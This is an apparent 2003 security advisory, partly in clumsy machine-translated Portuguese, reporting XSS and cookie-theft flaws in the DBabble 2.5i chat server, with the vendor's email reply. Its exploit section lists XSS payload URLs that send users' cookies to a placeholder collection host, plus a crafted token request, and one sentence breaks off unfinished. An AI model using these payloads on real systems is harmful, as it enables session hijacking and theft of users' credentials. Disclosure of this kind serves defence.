DBabble 2.5i sofre durante as edições dos scripts locais podendo causar um cookie hijacking.

*first published on: http://members.lycos.co.uk/r34ct/
---------------------------------------------------------------------------------------------
DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory
----------------------------------------------------------------------------------------------------------------------
DBabble 2.5i XSS/Cookie Problem
12/09/2003
-by dr_insane ([email protected])
-http://members.lycos.co.uk/r34ct/-------------------
Vendor Information:
-------------------
Homepage: http://www.netwinsite.com/
Vendor informed
Vender Response : None (yet?)
Here is the answer from the Vendor:
From [email protected] Tue Sep 16 00 : 39:06 2003
Return-Path : <[email protected]>
Received : from netwin.co.nz (smtp.netwin.co.nz [210.54.249.114]) by monster.phaistosnetworks.gr (8.12.9/8.12.5) with ESMTP id h8FLd2U5021801 for <[email protected]>; Tue, 16 Sep 2003 00:39:04 +0300
Received : from matt2 (unverified [10.0.0.26]) by netwin.co.nz (SurgeMail 1.5a) with ESMTP id 839253 for <[email protected]>; Tue, 16 Sep 2003 09:37:04 +1200
from : Matt Kearse <[email protected]>
X-Mailer : The Bat! (v1.63 Beta/7)
Reply-To : [email protected]
Organization : NetWin Ltd
X-Priority : 3 (Normal)
Message-ID : <[email protected]>
To : "xxxx xxxxxx" <[email protected]>
Topic : Re: DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory
In-Reply-To : <[email protected]>
References : <[email protected]>
MIME-Version : 1.0
Content-type : text/plain; charset=ISO-8859-7
Content-transfer-encoding : 8bit
X-Server : High Performance Mail Server - http://surgemail.com
Hi ,
Thanks for letting us know about these problems. We should have a
fixed version available within a day or two. I will let you know when
we do.
Regards,
Matt Kearse.
-------------------
Affected Versions/systems:
-------------------
(Version 2.5i is vulnerable. Older versions may be vulnerable too)
Dbabble Solaris (Sparc)
Dbabble Linux libc6/redhat 5/6
Dbabble Free BSD
Dbabble MacOS X
Dbabble Freebsd
Dbabble AIX
Dbabble Windows NT/2000/XP/95/98/ME
NO VULNERABLE VERSIONS
- ?
-------------------
Description:
-------------------
DBabble é um bate-papo, discussão, e servidor de correio eletrônico instantâneo e cliente, que permite usuários para enviar codificados mensagens instantâneas, têm conversas particulares, e criam e participam em quartos de bate-papo públicos ou particulares e discussões. Usuários comunicam com o servidor de bate-papo usando um ou outro um browser de web, ou um cliente ao Windows 95/98/ME/NT/2000/XP. Usuários podem comunicar com o ICQ, MSN, Yahoo, e ALVO (AOL) usuários, enviam mensagens instantâneas para agrupar de usuários, recebem email copia de suas mensagens instantâneas ou nova discussão agrupa artigos, e eles podem enviar e recebem correio eletrônico instantâneo de email endereça e telefones móveis. Discussão groups/forums pode opcionalmente ser ligada para usenet externo (NNTP) grupos and/or feitos disponíveis para clientes do NNTP. Um servidor de bate-papo do DBabble único pode suportar milhares de usuários online simultâneos e podem opcionalmente ser isolados de comunicação de exterior.
Eu encontrei buracos de segurança do XSS em algumas escritas de Dbabble 2.5i e alguns outros problemas.-----------------------------
Vulnerável Scripts/Exploit:
--------------------------------------------
(1)
http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS ATTACK]
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields name,password and Display name are vulnerable to XSS ATTACK)
Another problem is that Dbabble uses cookies. So it is possible for someone to steal them using XSS
attacks and some javascript.
Examples:
http://[HOST]/dbabble?cmd="><script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?
'%20+document.cookie</script>
http://[HOST]/dbabble?cmd=<script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>
http://[HOST]/dbabble?cmd=><script&gtdocument.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>
Esses são os exemplos de "mau" Javascript . Esses exemplos do Javascript juntam
o biscoitinho dos usuários e então envia uma solicitação à yourhost.org website com o biscoitinho no
pergunta .
Quando você acessa um elo hostil com um xss ataca naqueles youur de escritas
browser executará os comandos de escrita.
Isto pode ser usado para rouba biscoitinhos , símbolos de autenticação e outro
informação particular.
Se seu browser é vulnerável para outros buracos ( MSIE igual ;-) você pode


http:[HOST]/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=WHATEVER!!!!

-----------------
| SoLuTiOnS |
-----------------
Update to the next Version:>
-----------
| CONTACT |
-----------
Dr_insane
[email protected]
http://members.lycos.co.uk/r34ct/
Greece

----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------
______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!
http://www.pathfinder.gr - ÄùñåÜí mail áðü ôïí Pathfinder!

Cracks's S.A
Hosted by www.Geocities.ws

1